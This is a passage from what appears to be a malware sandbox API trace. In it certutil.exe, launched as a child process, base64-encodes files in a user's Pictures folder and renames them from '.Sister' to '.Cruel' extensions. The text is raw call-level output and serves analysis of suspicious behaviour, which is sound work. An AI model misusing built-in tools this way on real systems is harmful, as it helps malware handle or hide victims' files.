lpWideCharStr=0x1f974bdaf90, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0298.700] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f974bddb40 [0298.700] _vsnwprintf (in: _Buffer=0x1f974bddb40, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x32deebfab8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0298.700] LocalFree (hMem=0x1f974bdaf90) returned 0x0 [0298.700] LocalFree (hMem=0x0) returned 0x0 [0298.700] GetACP () returned 0x4e4 [0298.700] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0298.700] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f974bdb190 [0298.700] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1f974bdb190, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0298.700] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1f974bdd700 [0298.700] _vsnwprintf (in: _Buffer=0x1f974bdd700, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x32deebfae8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0298.700] LocalFree (hMem=0x1f974bdb190) returned 0x0 [0298.700] LocalFree (hMem=0x1f974bdd780) returned 0x0 [0298.700] LocalFree (hMem=0x1f974bddb40) returned 0x0 [0298.700] LocalFree (hMem=0x1f974bdd700) returned 0x0 [0298.701] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0298.701] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0298.701] GetStockObject (i=0) returned 0x900010 [0298.701] RegisterClassW (lpWndClass=0x32deebfc10) returned 0xc1a2 [0298.701] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2402c8 [0298.717] NtdllDefWindowProc_W () returned 0x0 [0298.718] NtdllDefWindowProc_W () returned 0x1 [0298.724] NtdllDefWindowProc_W () returned 0x0 [0298.737] UpdateWindow (hWnd=0x2402c8) returned 1 [0298.737] PostMessageW (hWnd=0x2402c8, Msg=0x400, wParam=0x0, lParam=0x1f974bc217e) returned 1 [0298.737] GetMessageW (in: lpMsg=0x32deebfc60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x32deebfc60) returned 1 [0298.737] TranslateMessage (lpMsg=0x32deebfc60) returned 0 [0298.737] DispatchMessageW (lpMsg=0x32deebfc60) returned 0x0 [0298.737] NtdllDefWindowProc_W () returned 0x0 [0298.737] GetMessageW (in: lpMsg=0x32deebfc60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x32deebfc60) returned 1 [0298.738] TranslateMessage (lpMsg=0x32deebfc60) returned 0 [0298.738] DispatchMessageW (lpMsg=0x32deebfc60) returned 0x0 [0298.738] LocalAlloc (uFlags=0x0, uBytes=0x6a) returned 0x1f974bd4620 [0298.738] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x1f974bc62d0 [0298.738] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0298.738] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0298.738] SetLastError (dwErrCode=0x80070716) [0298.738] _vsnwprintf (in: _Buffer=0x32deebf668, _BufferCount=0xb, _Format="%d", _ArgList=0x32deebf658 | out: _Buffer="465") returned 3 [0298.738] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x32deebf420, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0298.738] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1f974bcc160 [0298.738] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0298.738] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0298.739] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x32deebf400, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0298.739] GetLastError () returned 0xcb [0298.739] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0298.739] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0298.739] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0298.739] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0298.739] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0298.739] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0298.739] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0298.739] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0298.739] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0298.739] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0298.739] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0298.739] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0298.739] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0298.739] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0298.739] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0298.740] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0298.740] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0298.740] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0298.740] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0298.740] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0298.740] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0298.740] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x32deebf0c8 | out: phkResult=0x32deebf0c8*=0x23c) returned 0x0 [0298.740] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1f974bc43e0 [0298.740] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x32deebf638, lpData=0x32deebf668, lpcbData=0x32deebf630*=0x4 | out: lpType=0x32deebf638*=0x0, lpData=0x32deebf668*=0x0, lpcbData=0x32deebf630*=0x4) returned 0x2 [0298.740] LocalFree (hMem=0x1f974bc43e0) returned 0x0 [0298.740] RegCloseKey (hKey=0x23c) returned 0x0 [0298.740] LocalFree (hMem=0x0) returned 0x0 [0298.740] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1f974bee550 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0298.755] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0298.755] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0298.756] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1f974bf3500 [0298.756] GetComputerNameW (in: lpBuffer=0x1f974bf3500, nSize=0x32deebf630 | out: lpBuffer="NQDPDE", nSize=0x32deebf630) returned 1 [0298.756] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x32deebf600 | out: lpBuffer=0x0, nSize=0x32deebf600) returned 0 [0298.756] GetLastError () returned 0xea [0298.756] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1f974bdb030 [0298.756] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1f974bdb030, nSize=0x32deebf600 | out: lpBuffer="NQdPdE", nSize=0x32deebf600) returned 1 [0298.756] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0298.759] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1f974bf3690, cbCertEncoded=0x1623) returned 0x0 [0298.761] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1f974bf3690, cbCrlEncoded=0x1623) returned 0x0 [0298.761] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1f974bf3690, cbEncoded=0x1623, dwFlags=0x8000, pDecodePara=0x32deebf4e0, pvStructInfo=0x32deebf570, pcbStructInfo=0x32deebf564 | out: pvStructInfo=0x32deebf570, pcbStructInfo=0x32deebf564) returned 0 [0298.762] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1f974bf3690, cbEncoded=0x1623, dwFlags=0x8000, pDecodePara=0x32deebf4e0, pvStructInfo=0x32deebf570, pcbStructInfo=0x32deebf564 | out: pvStructInfo=0x32deebf570, pcbStructInfo=0x32deebf564) returned 0 [0298.762] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1f974bf3690, cbEncoded=0x1623, dwFlags=0x8000, pDecodePara=0x32deebf4e0, pvStructInfo=0x32deebf570, pcbStructInfo=0x32deebf564 | out: pvStructInfo=0x32deebf570, pcbStructInfo=0x32deebf564) returned 0 [0298.762] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1f974bd00e0 [0298.773] CryptMsgUpdate (hCryptMsg=0x1f974bd00e0, pbData=0x1f974bf3690, cbData=0x1623, fFinal=1) returned 0 [0298.773] GetLastError () returned 0x8009310b [0298.773] CryptMsgClose (hCryptMsg=0x1f974bd00e0) returned 1 [0298.773] GetFileAttributesExW (in: lpFileName="Gq9O pR9E.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp.sister"), fInfoLevelId=0x0, lpFileInformation=0x32deebf590 | out: lpFileInformation=0x32deebf590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32594d70, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x26a4bbe0, ftLastAccessTime.dwHighDateTime=0x1d5e9aa, ftLastWriteTime.dwLowDateTime=0x26a4bbe0, ftLastWriteTime.dwHighDateTime=0x1d5e9aa, nFileSizeHigh=0x0, nFileSizeLow=0x1623)) returned 1 [0298.773] _vsnwprintf (in: _Buffer=0x32deebf598, _BufferCount=0xb, _Format="%d", _ArgList=0x32deebf588 | out: _Buffer="359") returned 3 [0298.773] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x32deebf350, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0298.773] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1f974bf2f90 [0298.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.773] _vsnwprintf (in: _Buffer=0x32deebe580, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x32deebf5d8 | out: _Buffer="Input Length = 5667") returned 19 [0298.773] GetFileType (hFile=0x50) returned 0x2 [0298.774] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x32deebe580*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x32deebe534, lpReserved=0x0 | out: lpBuffer=0x32deebe580*, lpNumberOfCharsWritten=0x32deebe534*=0x13) returned 1 [0298.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.775] _vsnwprintf (in: _Buffer=0x32deebe580, _BufferCount=0x1ff, _Format="\n", _ArgList=0x32deebf5d8 | out: _Buffer="\n") returned 1 [0298.775] GetFileType (hFile=0x50) returned 0x2 [0298.775] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x32deebe580*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x32deebe534, lpReserved=0x0 | out: lpBuffer=0x32deebe580*, lpNumberOfCharsWritten=0x32deebe534*=0x1) returned 1 [0298.786] GetFileAttributesExW (in: lpFileName="Gq9O pR9E.bmp.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\gq9o pr9e.bmp.cruel"), fInfoLevelId=0x0, lpFileInformation=0x32deebf590 | out: lpFileInformation=0x32deebf590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcb24a19, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdcb24a19, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdcb2f71f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1eaa)) returned 1 [0298.786] _vsnwprintf (in: _Buffer=0x32deebf598, _BufferCount=0xb, _Format="%d", _ArgList=0x32deebf588 | out: _Buffer="361") returned 3 [0298.786] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x32deebf350, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0298.786] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1f974bf2fc0 [0298.786] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.786] _vsnwprintf (in: _Buffer=0x32deebe580, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x32deebf5d8 | out: _Buffer="Output Length = 7850") returned 20 [0298.786] GetFileType (hFile=0x50) returned 0x2 [0298.786] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x32deebe580*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x32deebe534, lpReserved=0x0 | out: lpBuffer=0x32deebe580*, lpNumberOfCharsWritten=0x32deebe534*=0x14) returned 1 [0298.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.789] _vsnwprintf (in: _Buffer=0x32deebe580, _BufferCount=0x1ff, _Format="\n", _ArgList=0x32deebf5d8 | out: _Buffer="\n") returned 1 [0298.789] GetFileType (hFile=0x50) returned 0x2 [0298.789] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x32deebe580*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x32deebe534, lpReserved=0x0 | out: lpBuffer=0x32deebe580*, lpNumberOfCharsWritten=0x32deebe534*=0x1) returned 1 [0298.794] LocalFree (hMem=0x1f974bf3690) returned 0x0 [0298.794] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0298.794] _vsnwprintf (in: _Buffer=0x32deebf5f8, _BufferCount=0xb, _Format="%d", _ArgList=0x32deebf5e8 | out: _Buffer="2022") returned 4 [0298.794] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x32deebf3b0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0298.794] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1f974bc9900 [0298.794] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.794] _vsnwprintf (in: _Buffer=0x32deebe5e0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x32deebf638 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0298.794] GetFileType (hFile=0x50) returned 0x2 [0298.794] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x32deebe5e0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x32deebe594, lpReserved=0x0 | out: lpBuffer=0x32deebe5e0*, lpNumberOfCharsWritten=0x32deebe594*=0x31) returned 1 [0298.795] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0298.795] _vsnwprintf (in: _Buffer=0x32deebe5e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x32deebf638 | out: _Buffer="\n") returned 1 [0298.795] GetFileType (hFile=0x50) returned 0x2 [0298.795] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x32deebe5e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x32deebe594, lpReserved=0x0 | out: lpBuffer=0x32deebe5e0*, lpNumberOfCharsWritten=0x32deebe594*=0x1) returned 1 [0298.801] LocalFree (hMem=0x0) returned 0x0 [0298.801] LocalFree (hMem=0x1f974bc62d0) returned 0x0 [0298.801] LocalFree (hMem=0x1f974bd4620) returned 0x0 [0298.801] SetLastError (dwErrCode=0x80070716) [0298.802] _vsnwprintf (in: _Buffer=0x32deebf668, _BufferCount=0xb, _Format="%d", _ArgList=0x32deebf658 | out: _Buffer="511") returned 3 [0298.802] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x32deebf420, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0298.802] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1f974bf31a0 [0298.802] PostQuitMessage (nExitCode=0) [0298.804] GetMessageW (in: lpMsg=0x32deebfc60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x32deebfc60) returned 0 [0298.804] LocalFree (hMem=0x1f974bdb030) returned 0x0 [0298.804] LocalFree (hMem=0x1f974bf3500) returned 0x0 [0298.804] LocalFree (hMem=0x0) returned 0x0 [0298.804] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0298.804] GetLastError () returned 0x7e [0298.805] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0298.805] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0298.805] DllMain () returned 0x1 [0298.805] LocalFree (hMem=0x1f974bdb2b0) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bcc160) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bf2f90) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bf2fc0) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bc9900) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bf31a0) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bd14b0) returned 0x0 [0298.805] LocalFree (hMem=0x1f974bcc100) returned 0x0 [0298.805] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0298.805] GetLastError () returned 0x7e [0298.805] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0298.805] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0298.805] DllMain () returned 0x1 [0298.806] exit (_Code=0) Thread: id = 124 os_tid = 0x112c Process: id = "49" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x5926a000" os_pid = "0x11d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0xf40 [0299.112] GetStartupInfoW (in: lpStartupInfo=0x24ba27f8a0 | out: lpStartupInfo=0x24ba27f8a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0299.116] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0299.116] __set_app_type (_Type=0x1) [0299.117] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0299.117] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0299.119] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0299.119] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0299.119] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0299.119] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0299.119] WerSetFlags () returned 0x0 [0299.119] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0299.119] __iob_func () returned 0x7ffcea2dea00 [0299.120] _fileno (_File=0x7ffcea2dea30) returned 1 [0299.120] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0299.120] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0299.121] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0299.121] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0299.121] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0299.121] GetConsoleOutputCP () returned 0x1b5 [0299.121] _vsnwprintf (in: _Buffer=0x24ba27f810, _BufferCount=0xb, _Format=".%d", _ArgList=0x24ba27f738 | out: _Buffer=".437") returned 4 [0299.122] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0299.122] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.122] GetFileType (hFile=0x50) returned 0x2 [0299.122] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0299.122] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0299.122] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.122] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0299.123] GetCommandLineW () returned="certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"" [0299.123] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x21e2859b8b0 [0299.123] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x21e2858ce00 [0299.123] LocalFree (hMem=0x21e2859b8b0) returned 0x0 [0299.123] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x21e2858c090 [0299.123] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x21e2858bd90 [0299.123] LocalFree (hMem=0x21e2858c090) returned 0x0 [0299.123] LocalFree (hMem=0x21e2858ce00) returned 0x0 [0299.123] LocalFree (hMem=0x0) returned 0x0 [0299.123] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0299.123] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0299.124] GetCommandLineW () returned="certutil -encode \"hx6X83DtmMlRtgH7hUE7.jpg.Sister\" \"hx6X83DtmMlRtgH7hUE7.jpg.Cruel\"" [0299.124] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x21e2859b770 [0299.124] GetSystemTime (in: lpSystemTime=0x24ba27f500 | out: lpSystemTime=0x24ba27f500*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0xd, wMilliseconds=0x298)) [0299.124] SystemTimeToFileTime (in: lpSystemTime=0x24ba27f500, lpFileTime=0x24ba27f4f8 | out: lpFileTime=0x24ba27f4f8) returned 1 [0299.124] FileTimeToLocalFileTime (in: lpFileTime=0x24ba27f4f8, lpLocalFileTime=0x24ba27f4c0 | out: lpLocalFileTime=0x24ba27f4c0) returned 1 [0299.124] FileTimeToSystemTime (in: lpFileTime=0x24ba27f4c0, lpSystemTime=0x24ba27f230 | out: lpSystemTime=0x24ba27f230) returned 1 [0299.124] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x24ba27f230, lpFormat=0x0, lpDateStr=0x24ba27f340, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0299.124] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x24ba27f230, lpFormat=0x0, lpTimeStr=0x24ba27f240, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0299.124] _vsnwprintf (in: _Buffer=0x24ba27f24e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x24ba27f218 | out: _Buffer=" 13.664s") returned 8 [0299.124] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x21e2859e050 [0299.124] SetLastError (dwErrCode=0x80070716) [0299.124] _vsnwprintf (in: _Buffer=0x24ba27f2c8, _BufferCount=0xb, _Format="%d", _ArgList=0x24ba27f2b8 | out: _Buffer="948") returned 3 [0299.124] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x24ba27f080, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0299.125] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x21e2859b850 [0299.125] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x21e285a4c90 [0299.125] LocalFree (hMem=0x21e2859e050) returned 0x0 [0299.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ba27f570 | out: lpSystemTimeAsFileTime=0x24ba27f570*(dwLowDateTime=0xdce6b15d, dwHighDateTime=0x1d6141f)) [0299.125] GetLocalTime (in: lpSystemTime=0x24ba27f5a8 | out: lpSystemTime=0x24ba27f5a8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0xd, wMilliseconds=0x299)) [0299.125] SystemTimeToFileTime (in: lpSystemTime=0x24ba27f5a8, lpFileTime=0x24ba27f580 | out: 